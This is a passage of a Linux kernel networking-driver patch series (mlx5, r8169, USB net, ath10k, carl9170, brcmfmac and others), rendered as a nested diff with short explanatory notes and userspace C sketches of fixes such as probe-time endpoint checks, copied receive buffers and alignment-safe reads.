+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -696,6 +696,7 @@ static bool mlx5_lag_check_prereq(struct mlx5_lag *ldev)
+ 	struct mlx5_core_dev *dev;
+ 	u8 mode;
+ #endif
++	bool roce_support;
+ 	int i;
+ 
+ 	for (i = 0; i < ldev->ports; i++)
+@@ -722,6 +723,11 @@ static bool mlx5_lag_check_prereq(struct mlx5_lag *ldev)
+ 		if (mlx5_sriov_is_enabled(ldev->pf[i].dev))
+ 			return false;
+ #endif
++	roce_support = mlx5_get_roce_state(ldev->pf[MLX5_LAG_P1].dev);
++	for (i = 1; i < ldev->ports; i++)
++		if (mlx5_get_roce_state(ldev->pf[i].dev) != roce_support)
++			return false;
++
+ 	return true;
+ }
+ 
+@@ -884,8 +890,10 @@ static void mlx5_do_bond(struct mlx5_lag *ldev)
+ 		} else if (roce_lag) {
+ 			dev0->priv.flags &= ~MLX5_PRIV_FLAGS_DISABLE_IB_ADEV;
+ 			mlx5_rescan_drivers_locked(dev0);
+-			for (i = 1; i < ldev->ports; i++)
+-				mlx5_nic_vport_enable_roce(ldev->pf[i].dev);
++			for (i = 1; i < ldev->ports; i++) {
++				if (mlx5_get_roce_state(ldev->pf[i].dev))
++					mlx5_nic_vport_enable_roce(ldev->pf[i].dev);
++			}
+ 		} else if (shared_fdb) {
+ 			dev0->priv.flags &= ~MLX5_PRIV_FLAGS_DISABLE_IB_ADEV;
+ 			mlx5_rescan_drivers_locked(dev0);
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_main.c b/drivers/net/ethernet/qlogic/qed/qed_main.c
+index 25d9c254288b5..956ae0206a1f9 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_main.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_main.c
+@@ -1215,7 +1215,6 @@ static void qed_slowpath_task(struct work_struct *work)
+ static int qed_slowpath_wq_start(struct qed_dev *cdev)
+ {
+ 	struct qed_hwfn *hwfn;
+-	char name[NAME_SIZE];
+ 	int i;
+ 
+ 	if (IS_VF(cdev))
+@@ -1224,11 +1223,11 @@ static int qed_slowpath_wq_start(struct qed_dev *cdev)
+ 	for_each_hwfn(cdev, i) {
+ 		hwfn = &cdev->hwfns[i];
+ 
+-		snprintf(name, NAME_SIZE, "slowpath-%02x:%02x.%02x",
+-			 cdev->pdev->bus->number,
+-			 PCI_SLOT(cdev->pdev->devfn), hwfn->abs_pf_id);
++		hwfn->slowpath_wq = alloc_workqueue("slowpath-%02x:%02x.%02x",
++					 0, 0, cdev->pdev->bus->number,
++					 PCI_SLOT(cdev->pdev->devfn),
++					 hwfn->abs_pf_id);
+ 
+-		hwfn->slowpath_wq = alloc_workqueue(name, 0, 0);
+ 		if (!hwfn->slowpath_wq) {
+ 			DP_NOTICE(hwfn, "Cannot create slowpath workqueue\n");
+ 			return -ENOMEM;
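
alloc_workqueue() takes a printf-style format, so the qed hunk drops the intermediate name[NAME_SIZE] buffer (and any truncation risk) by formatting in place. A userspace sketch of the same idea, with asprintf() standing in for the kernel helper:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>

static char *make_wq_name(unsigned int bus, unsigned int slot,
			  unsigned int pf)
{
	char *name = NULL;

	/* format directly, sized by the allocator rather than a fixed buffer */
	if (asprintf(&name, "slowpath-%02x:%02x.%02x", bus, slot, pf) < 0)
		return NULL;
	return name;	/* caller frees */
}
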
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 6e3417712e402..f83bd15f9e994 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -4263,11 +4263,11 @@ static void rtl8169_doorbell(struct rtl8169_private *tp)
+ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 				      struct net_device *dev)
+ {
+-	unsigned int frags = skb_shinfo(skb)->nr_frags;
+ 	struct rtl8169_private *tp = netdev_priv(dev);
+ 	unsigned int entry = tp->cur_tx % NUM_TX_DESC;
+ 	struct TxDesc *txd_first, *txd_last;
+ 	bool stop_queue, door_bell;
++	unsigned int frags;
+ 	u32 opts[2];
+ 
+ 	if (unlikely(!rtl_tx_slots_avail(tp))) {
+@@ -4290,6 +4290,7 @@ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 
+ 	txd_first = tp->TxDescArray + entry;
+ 
++	frags = skb_shinfo(skb)->nr_frags;
+ 	if (frags) {
+ 		if (rtl8169_xmit_frags(tp, skb, opts, entry))
+ 			goto err_dma_1;
+@@ -4607,10 +4608,8 @@ static irqreturn_t rtl8169_interrupt(int irq, void *dev_instance)
+ 		rtl_schedule_task(tp, RTL_FLAG_TASK_RESET_PENDING);
+ 	}
+ 
+-	if (napi_schedule_prep(&tp->napi)) {
+-		rtl_irq_disable(tp);
+-		__napi_schedule(&tp->napi);
+-	}
++	rtl_irq_disable(tp);
++	napi_schedule(&tp->napi);
+ out:
+ 	rtl_ack_events(tp, status);
+ 
+diff --git a/drivers/net/ethernet/smsc/smc91x.h b/drivers/net/ethernet/smsc/smc91x.h
+index c521ea8f94f2f..9c74d25421414 100644
+--- a/drivers/net/ethernet/smsc/smc91x.h
++++ b/drivers/net/ethernet/smsc/smc91x.h
+@@ -175,8 +175,8 @@ static inline void mcf_outsw(void *a, unsigned char *p, int l)
+ 		writew(*wp++, a);
+ }
+ 
+-#define SMC_inw(a, r)		_swapw(readw((a) + (r)))
+-#define SMC_outw(lp, v, a, r)	writew(_swapw(v), (a) + (r))
++#define SMC_inw(a, r)		ioread16be((a) + (r))
++#define SMC_outw(lp, v, a, r)	iowrite16be(v, (a) + (r))
+ #define SMC_insw(a, r, p, l)	mcf_insw(a + r, p, l)
+ #define SMC_outsw(a, r, p, l)	mcf_outsw(a + r, p, l)
+ 
+diff --git a/drivers/net/ethernet/sun/sungem.c b/drivers/net/ethernet/sun/sungem.c
+index 4154e68639ace..940e45bf7a2eb 100644
+--- a/drivers/net/ethernet/sun/sungem.c
++++ b/drivers/net/ethernet/sun/sungem.c
+@@ -948,17 +948,6 @@ static irqreturn_t gem_interrupt(int irq, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-#ifdef CONFIG_NET_POLL_CONTROLLER
+-static void gem_poll_controller(struct net_device *dev)
+-{
+-	struct gem *gp = netdev_priv(dev);
+-
+-	disable_irq(gp->pdev->irq);
+-	gem_interrupt(gp->pdev->irq, dev);
+-	enable_irq(gp->pdev->irq);
+-}
+-#endif
+-
+ static void gem_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ {
+ 	struct gem *gp = netdev_priv(dev);
+@@ -2838,9 +2827,6 @@ static const struct net_device_ops gem_netdev_ops = {
+ 	.ndo_change_mtu		= gem_change_mtu,
+ 	.ndo_validate_addr	= eth_validate_addr,
+ 	.ndo_set_mac_address    = gem_set_mac_address,
+-#ifdef CONFIG_NET_POLL_CONTROLLER
+-	.ndo_poll_controller    = gem_poll_controller,
+-#endif
+ };
+ 
+ static int gem_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index d447f3076e24a..1d49771d07f4c 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -439,7 +439,7 @@ static noinline_for_stack int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ 
+ 	memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
+ 
+-	err = ip_local_out(net, skb->sk, skb);
++	err = ip_local_out(net, NULL, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		DEV_STATS_INC(dev, tx_errors);
+ 	else
+@@ -494,7 +494,7 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 
+ 	memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
+ 
+-	err = ip6_local_out(dev_net(dev), skb->sk, skb);
++	err = ip6_local_out(dev_net(dev), NULL, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		DEV_STATS_INC(dev, tx_errors);
+ 	else
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 2cbb1d1830bbd..98c6d0caf8faf 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -3245,6 +3245,7 @@ static struct phy_driver ksphy_driver[] = {
+ 	/* PHY_BASIC_FEATURES */
+ 	.probe		= kszphy_probe,
+ 	.config_init	= ksz8061_config_init,
++	.soft_reset	= genphy_soft_reset,
+ 	.config_intr	= kszphy_config_intr,
+ 	.handle_interrupt = kszphy_handle_interrupt,
+ 	.suspend	= kszphy_suspend,
+diff --git a/drivers/net/usb/aqc111.c b/drivers/net/usb/aqc111.c
+index 7b8afa589a53c..284375f662f1e 100644
+--- a/drivers/net/usb/aqc111.c
++++ b/drivers/net/usb/aqc111.c
+@@ -1141,17 +1141,15 @@ static int aqc111_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			continue;
+ 		}
+ 
+-		/* Clone SKB */
+-		new_skb = skb_clone(skb, GFP_ATOMIC);
++		new_skb = netdev_alloc_skb_ip_align(dev->net, pkt_len);
+ 
+ 		if (!new_skb)
+ 			goto err;
+ 
+-		new_skb->len = pkt_len;
++		skb_put(new_skb, pkt_len);
++		memcpy(new_skb->data, skb->data, pkt_len);
+ 		skb_pull(new_skb, AQ_RX_HW_PAD);
+-		skb_set_tail_pointer(new_skb, new_skb->len);
+ 
+-		new_skb->truesize = SKB_TRUESIZE(new_skb->len);
+ 		if (aqc111_data->rx_checksum)
+ 			aqc111_rx_checksum(new_skb, pkt_desc);
+ 
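
This rx_fixup change, repeated below for smsc95xx and sr9700, replaces skb_clone() plus hand-edited len/data/truesize with a fresh, properly sized allocation and a memcpy, so every packet owns its buffer and reports a truthful truesize. A userspace sketch of the copy-out step (alloc_packet() is an illustrative stand-in for netdev_alloc_skb_ip_align()):

#include <stdlib.h>
#include <string.h>

struct packet {
	unsigned char *data;
	size_t len;
};

static struct packet *alloc_packet(const unsigned char *src, size_t len)
{
	struct packet *p = malloc(sizeof(*p));

	if (!p)
		return NULL;
	p->data = malloc(len);		/* own buffer, exact size */
	if (!p->data) {
		free(p);
		return NULL;
	}
	memcpy(p->data, src, len);	/* copy instead of aliasing the source */
	p->len = len;
	return p;
}
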
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 45a542659a814..d22ba63160b8d 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1367,6 +1367,9 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1060, 2)},	/* Telit LN920 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1070, 2)},	/* Telit FN990 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1080, 2)}, /* Telit FE990 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x10a0, 0)}, /* Telit FN920C04 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x10a4, 0)}, /* Telit FN920C04 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x10a9, 0)}, /* Telit FN920C04 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1100, 3)},	/* Telit ME910 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1101, 3)},	/* Telit ME910 dual modem */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1200, 5)},	/* Telit LE920 */
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 2fa46baa589e5..8e82184be5e7d 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -879,7 +879,7 @@ static int smsc95xx_start_rx_path(struct usbnet *dev)
+ static int smsc95xx_reset(struct usbnet *dev)
+ {
+ 	struct smsc95xx_priv *pdata = dev->driver_priv;
+-	u32 read_buf, write_buf, burst_cap;
++	u32 read_buf, burst_cap;
+ 	int ret = 0, timeout;
+ 
+ 	netif_dbg(dev, ifup, dev->net, "entering smsc95xx_reset\n");
+@@ -1003,10 +1003,13 @@ static int smsc95xx_reset(struct usbnet *dev)
+ 		return ret;
+ 	netif_dbg(dev, ifup, dev->net, "ID_REV = 0x%08x\n", read_buf);
+ 
++	ret = smsc95xx_read_reg(dev, LED_GPIO_CFG, &read_buf);
++	if (ret < 0)
++		return ret;
+ 	/* Configure GPIO pins as LED outputs */
+-	write_buf = LED_GPIO_CFG_SPD_LED | LED_GPIO_CFG_LNK_LED |
+-		LED_GPIO_CFG_FDX_LED;
+-	ret = smsc95xx_write_reg(dev, LED_GPIO_CFG, write_buf);
++	read_buf |= LED_GPIO_CFG_SPD_LED | LED_GPIO_CFG_LNK_LED |
++		    LED_GPIO_CFG_FDX_LED;
++	ret = smsc95xx_write_reg(dev, LED_GPIO_CFG, read_buf);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -1810,9 +1813,11 @@ static int smsc95xx_reset_resume(struct usb_interface *intf)
+ 
+ static void smsc95xx_rx_csum_offload(struct sk_buff *skb)
+ {
+-	skb->csum = *(u16 *)(skb_tail_pointer(skb) - 2);
++	u16 *csum_ptr = (u16 *)(skb_tail_pointer(skb) - 2);
++
++	skb->csum = (__force __wsum)get_unaligned(csum_ptr);
+ 	skb->ip_summed = CHECKSUM_COMPLETE;
+-	skb_trim(skb, skb->len - 2);
++	skb_trim(skb, skb->len - 2); /* remove csum */
+ }
+ 
+ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+@@ -1870,25 +1875,22 @@ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 				if (dev->net->features & NETIF_F_RXCSUM)
+ 					smsc95xx_rx_csum_offload(skb);
+ 				skb_trim(skb, skb->len - 4); /* remove fcs */
+-				skb->truesize = size + sizeof(struct sk_buff);
+ 
+ 				return 1;
+ 			}
+ 
+-			ax_skb = skb_clone(skb, GFP_ATOMIC);
++			ax_skb = netdev_alloc_skb_ip_align(dev->net, size);
+ 			if (unlikely(!ax_skb)) {
+ 				netdev_warn(dev->net, "Error allocating skb\n");
+ 				return 0;
+ 			}
+ 
+-			ax_skb->len = size;
+-			ax_skb->data = packet;
+-			skb_set_tail_pointer(ax_skb, size);
++			skb_put(ax_skb, size);
++			memcpy(ax_skb->data, packet, size);
+ 
+ 			if (dev->net->features & NETIF_F_RXCSUM)
+ 				smsc95xx_rx_csum_offload(ax_skb);
+ 			skb_trim(ax_skb, ax_skb->len - 4); /* remove fcs */
+-			ax_skb->truesize = size + sizeof(struct sk_buff);
+ 
+ 			usbnet_skb_return(dev, ax_skb);
+ 		}
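
smsc95xx_rx_csum_offload() above now reads the 2-byte checksum trailer with get_unaligned(), because the trailer can sit at any offset in the frame. A minimal sketch of an alignment-safe 16-bit load; memcpy() is the portable equivalent:

#include <stdint.h>
#include <string.h>

static uint16_t load_u16_unaligned(const void *p)
{
	uint16_t v;

	memcpy(&v, p, sizeof(v));	/* legal at any alignment */
	return v;
}
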
+diff --git a/drivers/net/usb/sr9700.c b/drivers/net/usb/sr9700.c
+index 3164451e1010c..0a662e42ed965 100644
+--- a/drivers/net/usb/sr9700.c
++++ b/drivers/net/usb/sr9700.c
+@@ -421,19 +421,15 @@ static int sr9700_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			skb_pull(skb, 3);
+ 			skb->len = len;
+ 			skb_set_tail_pointer(skb, len);
+-			skb->truesize = len + sizeof(struct sk_buff);
+ 			return 2;
+ 		}
+ 
+-		/* skb_clone is used for address align */
+-		sr_skb = skb_clone(skb, GFP_ATOMIC);
++		sr_skb = netdev_alloc_skb_ip_align(dev->net, len);
+ 		if (!sr_skb)
+ 			return 0;
+ 
+-		sr_skb->len = len;
+-		sr_skb->data = skb->data + 3;
+-		skb_set_tail_pointer(sr_skb, len);
+-		sr_skb->truesize = len + sizeof(struct sk_buff);
++		skb_put(sr_skb, len);
++		memcpy(sr_skb->data, skb->data + 3, len);
+ 		usbnet_skb_return(dev, sr_skb);
+ 
+ 		skb_pull(skb, len + SR_RX_OVERHEAD);
+diff --git a/drivers/net/wireless/ath/ar5523/ar5523.c b/drivers/net/wireless/ath/ar5523/ar5523.c
+index ce3d613fa36c4..2833e2206cc88 100644
+--- a/drivers/net/wireless/ath/ar5523/ar5523.c
++++ b/drivers/net/wireless/ath/ar5523/ar5523.c
+@@ -1589,6 +1589,20 @@ static int ar5523_probe(struct usb_interface *intf,
+ 	struct ar5523 *ar;
+ 	int error = -ENOMEM;
+ 
++	static const u8 bulk_ep_addr[] = {
++		AR5523_CMD_TX_PIPE | USB_DIR_OUT,
++		AR5523_DATA_TX_PIPE | USB_DIR_OUT,
++		AR5523_CMD_RX_PIPE | USB_DIR_IN,
++		AR5523_DATA_RX_PIPE | USB_DIR_IN,
++		0};
++
++	if (!usb_check_bulk_endpoints(intf, bulk_ep_addr)) {
++		dev_err(&dev->dev,
++			"Could not find all expected endpoints\n");
++		error = -ENODEV;
++		goto out;
++	}
++
+ 	/*
+ 	 * Load firmware if the device requires it.  This will return
+ 	 * -ENXIO on success and we'll get called back after the usb
+diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c
+index 6cdb225b7eacc..81058be3598f1 100644
+--- a/drivers/net/wireless/ath/ath10k/core.c
++++ b/drivers/net/wireless/ath/ath10k/core.c
+@@ -704,6 +704,9 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.max_spatial_stream = 4,
+ 		.fw = {
+ 			.dir = WCN3990_HW_1_0_FW_DIR,
++			.board = WCN3990_HW_1_0_BOARD_DATA_FILE,
++			.board_size = WCN3990_BOARD_DATA_SZ,
++			.board_ext_size = WCN3990_BOARD_EXT_DATA_SZ,
+ 		},
+ 		.sw_decrypt_mcast_mgmt = true,
+ 		.rx_desc_ops = &wcn3990_rx_desc_ops,
+diff --git a/drivers/net/wireless/ath/ath10k/debugfs_sta.c b/drivers/net/wireless/ath/ath10k/debugfs_sta.c
+index 87a3365330ff8..5598cf706daab 100644
+--- a/drivers/net/wireless/ath/ath10k/debugfs_sta.c
++++ b/drivers/net/wireless/ath/ath10k/debugfs_sta.c
+@@ -438,7 +438,7 @@ ath10k_dbg_sta_write_peer_debug_trigger(struct file *file,
+ 	}
+ out:
+ 	mutex_unlock(&ar->conf_mutex);
+-	return count;
++	return ret ?: count;
+ }
+ 
+ static const struct file_operations fops_peer_debug_trigger = {
+diff --git a/drivers/net/wireless/ath/ath10k/hw.h b/drivers/net/wireless/ath/ath10k/hw.h
+index 9643031a4427a..7ecdd0011cfa4 100644
+--- a/drivers/net/wireless/ath/ath10k/hw.h
++++ b/drivers/net/wireless/ath/ath10k/hw.h
+@@ -132,6 +132,7 @@ enum qca9377_chip_id_rev {
+ /* WCN3990 1.0 definitions */
+ #define WCN3990_HW_1_0_DEV_VERSION	ATH10K_HW_WCN3990
+ #define WCN3990_HW_1_0_FW_DIR		ATH10K_FW_DIR "/WCN3990/hw1.0"
++#define WCN3990_HW_1_0_BOARD_DATA_FILE "board.bin"
+ 
+ #define ATH10K_FW_FILE_BASE		"firmware"
+ #define ATH10K_FW_API_MAX		6
+diff --git a/drivers/net/wireless/ath/ath10k/targaddrs.h b/drivers/net/wireless/ath/ath10k/targaddrs.h
+index ec556bb88d658..ba37e6c7ced08 100644
+--- a/drivers/net/wireless/ath/ath10k/targaddrs.h
++++ b/drivers/net/wireless/ath/ath10k/targaddrs.h
+@@ -491,4 +491,7 @@ struct host_interest {
+ #define QCA4019_BOARD_DATA_SZ	  12064
+ #define QCA4019_BOARD_EXT_DATA_SZ 0
+ 
++#define WCN3990_BOARD_DATA_SZ	  26328
++#define WCN3990_BOARD_EXT_DATA_SZ 0
++
+ #endif /* __TARGADDRS_H__ */
+diff --git a/drivers/net/wireless/ath/ath10k/wmi.c b/drivers/net/wireless/ath/ath10k/wmi.c
+index 980d4124fa287..8a5a44d75b141 100644
+--- a/drivers/net/wireless/ath/ath10k/wmi.c
++++ b/drivers/net/wireless/ath/ath10k/wmi.c
+@@ -1762,12 +1762,32 @@ void ath10k_wmi_put_wmi_channel(struct ath10k *ar, struct wmi_channel *ch,
+ 
+ int ath10k_wmi_wait_for_service_ready(struct ath10k *ar)
+ {
+-	unsigned long time_left;
++	unsigned long time_left, i;
+ 
+ 	time_left = wait_for_completion_timeout(&ar->wmi.service_ready,
+ 						WMI_SERVICE_READY_TIMEOUT_HZ);
+-	if (!time_left)
+-		return -ETIMEDOUT;
++	if (!time_left) {
++		/* Sometimes the PCI HIF doesn't receive interrupt
++		 * for the service ready message even if the buffer
++		 * was completed. PCIe sniffer shows that it's
++		 * because the corresponding CE ring doesn't fire
++		 * it. Work around this by polling the CE rings once.
++		 */
++		ath10k_warn(ar, "failed to receive service ready completion, polling..\n");
++
++		for (i = 0; i < CE_COUNT; i++)
++			ath10k_hif_send_complete_check(ar, i, 1);
++
++		time_left = wait_for_completion_timeout(&ar->wmi.service_ready,
++							WMI_SERVICE_READY_TIMEOUT_HZ);
++		if (!time_left) {
++			ath10k_warn(ar, "polling timed out\n");
++			return -ETIMEDOUT;
++		}
++
++		ath10k_warn(ar, "service ready completion received, continuing normally\n");
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index 51fc77e93de5c..b863ead198bda 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -1226,14 +1226,7 @@ static int ath11k_mac_vif_setup_ps(struct ath11k_vif *arvif)
+ 
+ 	enable_ps = arvif->ps;
+ 
+-	if (!arvif->is_started) {
+-		/* mac80211 can update vif powersave state while disconnected.
+-		 * Firmware doesn't behave nicely and consumes more power than
+-		 * necessary if PS is disabled on a non-started vdev. Hence
+-		 * force-enable PS for non-running vdevs.
+-		 */
+-		psmode = WMI_STA_PS_MODE_ENABLED;
+-	} else if (enable_ps) {
++	if (enable_ps) {
+ 		psmode = WMI_STA_PS_MODE_ENABLED;
+ 		param = WMI_STA_PS_PARAM_INACTIVITY_TIME;
+ 
+diff --git a/drivers/net/wireless/ath/carl9170/tx.c b/drivers/net/wireless/ath/carl9170/tx.c
+index 6bb9aa2bfe654..88ef6e023f826 100644
+--- a/drivers/net/wireless/ath/carl9170/tx.c
++++ b/drivers/net/wireless/ath/carl9170/tx.c
+@@ -280,7 +280,8 @@ static void carl9170_tx_release(struct kref *ref)
+ 	 * carl9170_tx_fill_rateinfo() has filled the rate information
+ 	 * before we get to this point.
+ 	 */
+-	memset_after(&txinfo->status, 0, rates);
++	memset(&txinfo->pad, 0, sizeof(txinfo->pad));
++	memset(&txinfo->rate_driver_data, 0, sizeof(txinfo->rate_driver_data));
+ 
+ 	if (atomic_read(&ar->tx_total_queued))
+ 		ar->tx_schedule = true;
+diff --git a/drivers/net/wireless/ath/carl9170/usb.c b/drivers/net/wireless/ath/carl9170/usb.c
+index e4eb666c6eea4..a5265997b5767 100644
+--- a/drivers/net/wireless/ath/carl9170/usb.c
++++ b/drivers/net/wireless/ath/carl9170/usb.c
+@@ -1069,6 +1069,38 @@ static int carl9170_usb_probe(struct usb_interface *intf,
+ 			ar->usb_ep_cmd_is_bulk = true;
+ 	}
+ 
++	/* Verify that all expected endpoints are present */
++	if (ar->usb_ep_cmd_is_bulk) {
++		u8 bulk_ep_addr[] = {
++			AR9170_USB_EP_RX | USB_DIR_IN,
++			AR9170_USB_EP_TX | USB_DIR_OUT,
++			AR9170_USB_EP_CMD | USB_DIR_OUT,
++			0};
++		u8 int_ep_addr[] = {
++			AR9170_USB_EP_IRQ | USB_DIR_IN,
++			0};
++		if (!usb_check_bulk_endpoints(intf, bulk_ep_addr) ||
++		    !usb_check_int_endpoints(intf, int_ep_addr))
++			err = -ENODEV;
++	} else {
++		u8 bulk_ep_addr[] = {
++			AR9170_USB_EP_RX | USB_DIR_IN,
++			AR9170_USB_EP_TX | USB_DIR_OUT,
++			0};
++		u8 int_ep_addr[] = {
++			AR9170_USB_EP_IRQ | USB_DIR_IN,
++			AR9170_USB_EP_CMD | USB_DIR_OUT,
++			0};
++		if (!usb_check_bulk_endpoints(intf, bulk_ep_addr) ||
++		    !usb_check_int_endpoints(intf, int_ep_addr))
++			err = -ENODEV;
++	}
++
++	if (err) {
++		carl9170_free(ar);
++		return err;
++	}
++
+ 	usb_set_intfdata(intf, ar);
+ 	SET_IEEE80211_DEV(ar->hw, &intf->dev);
+ 
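
Both the ar5523 and carl9170 hunks validate at probe time that every endpoint the driver will use is actually present, failing with -ENODEV otherwise; usb_check_bulk_endpoints()/usb_check_int_endpoints() take a 0-terminated address list. A userspace sketch of that membership test (names are illustrative):

#include <stdbool.h>
#include <stddef.h>

static bool has_all_eps(const unsigned char *present, size_t n,
			const unsigned char *wanted)	/* 0-terminated list */
{
	size_t i;

	for (; *wanted; wanted++) {
		for (i = 0; i < n; i++)
			if (present[i] == *wanted)
				break;
		if (i == n)
			return false;	/* a required endpoint is missing */
	}
	return true;
}
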
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 3b1277a8bd617..99cc41135473a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -1640,6 +1640,15 @@ struct brcmf_random_seed_footer {
+ #define BRCMF_RANDOM_SEED_MAGIC		0xfeedc0de
+ #define BRCMF_RANDOM_SEED_LENGTH	0x100
+ 
++static noinline_for_stack void
++brcmf_pcie_provide_random_bytes(struct brcmf_pciedev_info *devinfo, u32 address)
++{
++	u8 randbuf[BRCMF_RANDOM_SEED_LENGTH];
++
++	get_random_bytes(randbuf, BRCMF_RANDOM_SEED_LENGTH);
++	memcpy_toio(devinfo->tcm + address, randbuf, BRCMF_RANDOM_SEED_LENGTH);
++}
++
+ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 					const struct firmware *fw, void *nvram,
+ 					u32 nvram_len)
+@@ -1682,7 +1691,6 @@ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 				.length = cpu_to_le32(rand_len),
+ 				.magic = cpu_to_le32(BRCMF_RANDOM_SEED_MAGIC),
+ 			};
+-			void *randbuf;
+ 
+ 			/* Some Apple chips/firmwares expect a buffer of random
+ 			 * data to be present before NVRAM
+@@ -1694,10 +1702,7 @@ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 				    sizeof(footer));
+ 
+ 			address -= rand_len;
+-			randbuf = kzalloc(rand_len, GFP_KERNEL);
+-			get_random_bytes(randbuf, rand_len);
+-			memcpy_toio(devinfo->tcm + address, randbuf, rand_len);
+-			kfree(randbuf);
++			brcmf_pcie_provide_random_bytes(devinfo, address);
+ 		}
+ 	} else {
+ 		brcmf_dbg(PCIE, "No matching NVRAM file found %s\n",
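
The brcmfmac hunk moves the 256-byte scratch buffer into its own helper, marked noinline_for_stack in the kernel so the array doesn't land on the caller's frame, and drops the heap allocation that previously had no failure check. A userspace sketch of the shape, assuming a GCC/Clang noinline attribute and stand-ins for get_random_bytes()/memcpy_toio():

#include <string.h>

#define SEED_LEN 0x100

static void __attribute__((noinline))
provide_random_bytes(unsigned char *dst)
{
	unsigned char buf[SEED_LEN];	/* confined to this frame */
	size_t i;

	for (i = 0; i < SEED_LEN; i++)	/* get_random_bytes() stand-in */
		buf[i] = (unsigned char)(i * 37u);
	memcpy(dst, buf, SEED_LEN);	/* memcpy_toio() stand-in */
}
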
+diff --git a/drivers/net/wireless/marvell/mwl8k.c b/drivers/net/wireless/marvell/mwl8k.c
+index 4dc7e2e53b81e..61697dad4ea61 100644
+--- a/drivers/net/wireless/marvell/mwl8k.c
++++ b/drivers/net/wireless/marvell/mwl8k.c
+@@ -2718,7 +2718,7 @@ __mwl8k_cmd_mac_multicast_adr(struct ieee80211_hw *hw, int allmulti,
+ 		cmd->action |= cpu_to_le16(MWL8K_ENABLE_RX_MULTICAST);
+ 		cmd->numaddr = cpu_to_le16(mc_count);
+ 		netdev_hw_addr_list_for_each(ha, mc_list) {
+-			memcpy(cmd->addr[i], ha->addr, ETH_ALEN);
++			memcpy(cmd->addr[i++], ha->addr, ETH_ALEN);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 2980e1234d13f..082ac1afc515a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1382,6 +1382,7 @@ void mt7603_pse_client_reset(struct mt7603_dev *dev)
+ 		   MT_CLIENT_RESET_TX_R_E_2_S);
+ 
+ 	/* Start PSE client TX abort */
++	mt76_set(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_FORCE_TX_EOF);
+ 	mt76_set(dev, addr, MT_CLIENT_RESET_TX_R_E_1);
+ 	mt76_poll_msec(dev, addr, MT_CLIENT_RESET_TX_R_E_1_S,
+ 		       MT_CLIENT_RESET_TX_R_E_1_S, 500);
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index f96d330d39641..6cf0ce7aff678 100644
+--- a/drivers/nvme/host/multipath.c
